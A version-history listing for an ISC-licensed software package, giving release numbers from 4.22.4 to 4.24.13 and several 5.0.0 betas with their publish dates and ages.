5.0.0-beta.7 ISC 1 2024-02-06 - 00:49 about 2 years
5.0.0-beta.6 ISC 1 2024-02-05 - 22:33 about 2 years
5.0.0-beta.5 ISC 1 2024-01-16 - 21:23 about 2 years
5.0.0-beta.4 ISC 1 2023-11-28 - 13:44 over 2 years
5.0.0-beta.3 ISC 1 2023-10-26 - 17:37 over 2 years
5.0.0-beta.2 ISC 1 2023-10-24 - 22:49 over 2 years
5.0.0-beta.1 ISC 1 2023-10-24 - 22:43 over 2 years
5.0.0-beta.0 ISC 1 2023-10-24 - 00:49 over 2 years
4.24.13 ISC 2025-10-29 - 20:52 5 months
4.24.12 ISC 2025-10-27 - 23:08 5 months
4.24.11 ISC 1 2024-12-06 - 18:11 over 1 year
4.24.10 ISC 1 2024-10-24 - 18:10 over 1 year
4.24.9 ISC 1 2024-10-24 - 11:17 over 1 year
4.24.8 ISC 1 2024-09-25 - 15:48 over 1 year
4.24.7 ISC 1 2024-03-07 - 14:52 about 2 years
4.24.6 ISC 1 2024-02-14 - 14:24 about 2 years
4.24.5 ISC 1 2023-11-10 - 18:04 over 2 years
4.24.4 ISC 2 2023-10-27 - 20:02 over 2 years
4.24.3 ISC 2 2023-10-18 - 15:06 over 2 years
4.24.2 ISC 2 2023-10-18 - 14:58 over 2 years
4.24.1 ISC 2 2023-10-18 - 14:37 over 2 years
4.24.0 ISC 2 2023-10-18 - 14:09 over 2 years
4.23.2 ISC 2 2023-10-02 - 11:59 over 2 years
4.23.1 ISC 2 2023-08-16 - 07:47 over 2 years
4.23.0 ISC 2 2023-08-11 - 11:44 over 2 years
4.22.5 ISC 2 2023-08-08 - 17:23 over 2 years
4.22.4 ISC 2 2023-08-06 - 15:54 over 2 years